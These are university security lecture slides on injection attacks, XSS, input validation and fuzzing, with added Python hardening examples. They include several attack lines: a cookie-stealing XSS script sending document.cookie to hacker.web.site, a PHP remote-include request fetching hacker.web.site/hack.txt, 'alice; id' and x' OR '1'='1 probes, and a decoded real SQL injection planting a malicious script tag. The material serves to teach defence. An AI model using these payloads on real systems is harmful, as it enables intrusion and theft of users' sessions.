CIS 433/533 - Computer and Network Security
Web Vulnerabilities, Wrapup
Professor Kevin Butler
Winter 2011
Computer and Information Science
Injection Attacks
- flaws relating to invalid input handling, which then influences program execution
- often when the input is passed as a parameter to a helper program or other utility or subsystem
- most often occurs in scripting languages, which encourage reuse of other programs / modules
- often seen in web CGI scripts
Unsafe Perl Script

```perl
#!/usr/bin/perl
# finger.cgi - finger CGI script using Perl5 CGI module

use CGI;
use CGI::Carp qw(fatalsToBrowser);
$q = new CGI;   # create query object

# display HTML header
print $q->header,
      $q->start_html('finger User'),
      $q->h1('finger User');
print "<pre>";

# get name of user and display their finger details
$user = $q->param("user");
# UNSAFE: $user is interpolated unvalidated into a command line that
# /bin/sh interprets, so shell metacharacters in the parameter change
# what actually gets executed
print `/usr/bin/finger -sh $user`;

# display HTML footer
print "</pre>";
print $q->end_html;
```
Safer Script
- counter the attack by validating input
- compare to a pattern that rejects invalid input
- see example additions to the script:

```perl
# get name of user and display their finger details
$user = $q->param("user");
# allow-list: only word characters [A-Za-z0-9_] are accepted
# (note: $ also matches before a trailing newline; \z is stricter)
die "The specified user contains illegal characters!"
    unless ($user =~ /^\w+$/);
print `/usr/bin/finger -sh $user`;
```
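The same fix carried one step further, as an added example in Python (not code from the slides): the allow-list check is kept, and the name is then handed to finger as a single argv element with no shell in between, so the backtick-style command string is never built. The path /usr/bin/finger is the one on the slide; the sample inputs are constructed.

```python
import re
import shlex
import subprocess

# Allow-list for the "user" parameter, checked with fullmatch: unlike the
# Perl /^\w+$/ on the slide, a trailing newline cannot slip past the check.
USER_RE = re.compile(r"[A-Za-z0-9_]+")

def lenient_match(user: str) -> bool:
    """The $-anchor gotcha: in Python as in Perl, $ also matches just
    before a trailing "\\n", so "alice\\n" passes this pattern."""
    return re.match(r"^\w+$", user) is not None

def validate_user(user: str) -> str:
    """Reject anything that is not a plain account name."""
    if not USER_RE.fullmatch(user):
        raise ValueError("The specified user contains illegal characters!")
    return user

def shell_command(user: str) -> str:
    """What the backtick line hands to /bin/sh: one flat string with the
    untrusted parameter interpolated into it."""
    return f"/usr/bin/finger -sh {user}"

def shell_words(command: str) -> list[str]:
    """Tokenise a command line as a POSIX shell would, keeping ; | & as
    operator tokens, to show where a second command begins."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))

def finger_argv(user: str) -> list[str]:
    """Hardened form: validate, then pass the name as ONE argv element.
    No shell is involved, so metacharacters carry no meaning."""
    return ["/usr/bin/finger", "-sh", validate_user(user)]

def run_finger(user: str) -> str:
    # A list argument with shell=False (the default) never spawns /bin/sh.
    proc = subprocess.run(finger_argv(user), capture_output=True,
                          text=True, check=False)
    return proc.stdout

if __name__ == "__main__":
    # Constructed input: a name followed by a second command.
    print(shell_words(shell_command("alice; id")))
    print(finger_argv("alice"))
```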
SQL Injection
- another widely exploited injection attack
- occurs when input is used in an SQL query to a database
- similar to command injection
- SQL meta-characters are the concern
- must check and validate input for these

Vulnerable (user input concatenated directly into the query text):

```php
$name   = $_REQUEST['name'];
$query  = "SELECT * FROM suppliers WHERE name = '" . $name . "';";
$result = mysql_query($query);
```

Escaped (meta-characters in the input neutralised before concatenation):

```php
$name   = $_REQUEST['name'];
$query  = "SELECT * FROM suppliers WHERE name = '" . mysql_real_escape_string($name) . "';";
$result = mysql_query($query);
```
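The two PHP snippets side by side in runnable form, as an added example (not code from the slides): a constructed in-memory SQLite suppliers table, the concatenated query, and a parameterised query that replaces escaping with parameter binding. Table columns and rows are made up for the example.

```python
import sqlite3

# Constructed in-memory stand-in for the suppliers table on the slide.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE suppliers (id INTEGER PRIMARY KEY, name TEXT, contact TEXT)")
con.executemany("INSERT INTO suppliers (name, contact) VALUES (?, ?)",
                [("Acme", "acme@example.invalid"),
                 ("Globex", "globex@example.invalid"),
                 ("Initech", "initech@example.invalid")])

def lookup_concat(name: str) -> list:
    """Mirror of the first PHP snippet: the name is spliced into the SQL text,
    so a quote in the input closes the literal and the rest is parsed as SQL."""
    query = "SELECT * FROM suppliers WHERE name = '" + name + "';"
    return con.execute(query).fetchall()

def lookup_param(name: str) -> list:
    """Hardened form: the name is bound as a parameter and never becomes SQL
    text. Stronger than the mysql_real_escape_string approach, because the
    parser never sees the input at all, whatever characters it contains."""
    return con.execute("SELECT * FROM suppliers WHERE name = ?;", (name,)).fetchall()

def legit_name_breaks(name: str) -> bool:
    """Honest input such as O'Brien also breaks the concatenated query:
    the bug is a correctness problem as well as a security one."""
    try:
        lookup_concat(name)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    probe = "x' OR '1'='1"   # constructed input containing SQL meta-characters
    print(len(lookup_concat(probe)))  # every row: the WHERE clause is now always true
    print(len(lookup_param(probe)))   # 0: no supplier is literally named that
    print(legit_name_breaks("O'Brien"))
```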
Consequences
When SQL injection goes bad...
Real SQL Injection
orderitem.asp?it=gm-204;declare%20@s%20nvarchar(4000);set%20@s=cast(0x... [hex-encoded payload elided]
Decoded result:

```sql
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name from sysobjects a, syscolumns b
  where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar, ['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')
  fetch NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
```

Every text column of every user table gets a script tag appended, so pages built from that data redirect visitors to a malicious domain where 8 different browser exploits are launched.
Code Injection
- a further variant: the input includes code that is then executed
- see the PHP remote code injection vulnerability
  - a variable used in include + request ("global") field variables that can set it + remote include enabled
- this type of attack is widely exploited

```php
<?php
include $path . 'functions.php';
include $path . 'data/prefs.php';
```

```
GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls
```
Cross Site Scripting Attacks
- attacks where input from one user is later output to another user
- XSS is commonly seen in scripted web apps with script code included in the output to the browser
- any supported script, e.g. JavaScript, ActiveX
- assumed to come from the application on the site
- XSS reflection: malicious code supplied to the site is subsequently displayed to other users
XSS Example
- guestbooks, wikis, blogs etc. where a comment includes script code, e.g. to collect cookie details of viewing users
- need to validate the data supplied, including handling various possible encodings
- attacks both input and output handling

```html
Thanks for this information, it's great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+
document.cookie</script>
```
Validating Input Syntax
- to ensure input data meets assumptions, e.g. is printable, HTML, email, userid etc.
- compare to what is known acceptable, not to what is known dangerous, as that can miss new problems and bypass methods
- commonly use regular expressions: a pattern of characters describing allowable input
- details vary between languages
- bad input is either rejected or altered
Input Fuzzing
- powerful testing method using a large range of randomly generated inputs
- tests whether a program/function correctly handles abnormal inputs
- simple, free of assumptions, cheap
- assists with reliability as well as security
- can also use templates to generate classes of known problem inputs
  - could then miss bugs, so use random inputs as well
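An added example (not code from the slides) tying the two slides above together: an allow-list validator that canonicalizes encodings before matching, the deny-list style the slides argue against, and a small fuzz harness that mixes random inputs with templates of known problem inputs and reports what each validator wrongly accepts. The user-id policy, the meta-character set and the templates are constructed for the example.

```python
import random
import re
import string
import unicodedata
import urllib.parse

# Allow-list: the only shape a user id may take (constructed policy).
USERID_RE = re.compile(r"[a-z][a-z0-9_]{0,31}")
# Characters the downstream shell or SQL layer must never receive.
META = set(";|&`$<>'\"\\\n")

def canonicalize(raw: str) -> str:
    """Undo layered encodings before checking: bounded repeated percent-decoding
    (double encoding) and NFKC folding (fullwidth ';' U+FF1B becomes ASCII ';')."""
    s = raw
    for _ in range(3):
        decoded = urllib.parse.unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return unicodedata.normalize("NFKC", s)

def allowlist_validate(raw: str):
    """Canonicalize first, then accept only what matches the known-good pattern."""
    s = canonicalize(raw)
    return s if USERID_RE.fullmatch(s) else None

def denylist_validate(raw: str):
    """The approach the slide warns against: look for known-bad characters in the
    raw input. Any encoding it did not anticipate passes straight through."""
    return None if META & set(raw) else raw

def fuzz(validator, rounds: int = 2000, seed: int = 1) -> list:
    """Drive a validator with random strings plus template-derived classes of known
    problem inputs; report accepted values that still carry a meta-character once
    the downstream layer has canonicalized them."""
    rng = random.Random(seed)
    alphabet = string.printable + "\uff1b\u00e9"
    templates = ["%3bid", "%253bid", "alice%0aid", "bob\uff1bid", "%2527"]
    failures = set()
    for i in range(rounds):
        if i % 10 == 0:          # one in ten drawn from the templates
            cand = rng.choice(templates)
        else:                    # the rest purely random
            cand = "".join(rng.choice(alphabet) for _ in range(rng.randint(0, 12)))
        accepted = validator(cand)
        if accepted is not None and META & set(canonicalize(accepted)):
            failures.add(cand)
    return sorted(failures)
```

Running `fuzz(denylist_validate)` lists the double-encoded and fullwidth variants the deny-list let through, while `fuzz(allowlist_validate)` comes back empty.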
Wrapup
So, what does it all mean?
The state of security
- issues are in the public consciousness
- Press coverage is increasing
- Losses mounting (billions and billions)
- Effect increasing (ATMs, commerce)
- Public is at risk...
- What are we doing? sound and fury signifying nothing (well, it's not quite that bad)
The problems
- What is the root cause?
- Security is not a key goal...
  ... and it never has been...
  ... so, we need to figure out how to change the way we do engineering (and science)...
  ... to make computers secure.
- Far too much misunderstanding about basic security and the use of technology (security theatre)
The current solutions
- Make better software
  - we mean it - B. Gates (2002)
  - no really - B. Gates (2003)
  - Linux/OS X/Sun OS etc. is bad too - B. Gates (2005)
  - Vista will fix everything - B. Gates (2006)
  - Vista fixes everything - B. Gates (2007)
  - Sorry about Vista... - B. Gates (2007.5)
  - Windows 7.0 will fix everything - B. Gates (2008)
- CERT/SANS-based problem/event tracking
  - Experts tracking vulnerabilities
  - Patch system completely broken
- Destructive research
  - Back-pressure on product developers
  - Arms-race with bad guys
- Problem: reactive, rather than proactive
The real solutions
- Fix the economic incentive equation
  - Eventually, MS/Sun/Apple/*** will be in enough pain that they change the way they make software
- Education
  - Things will get better when people understand how to use technology
- Fix engineering practices
  - Design for security
  - Apply technology
- What we have been talking about
Your new skills arsenal
- A little knowledge is a dangerous thing
- More and more, real lives are at stake through subverting computers
- With great power comes great responsibility
The bottom line
- The Web/Internet and new technologies have limited ability to address security and privacy concerns
- computer science is making the world less safe!!
- it is incumbent on us as scientists to meet these challenges
  - Evangelize the importance of security
  - Provide sound technologies
  - Define better practices
Computer and Information Science
Thank You!!!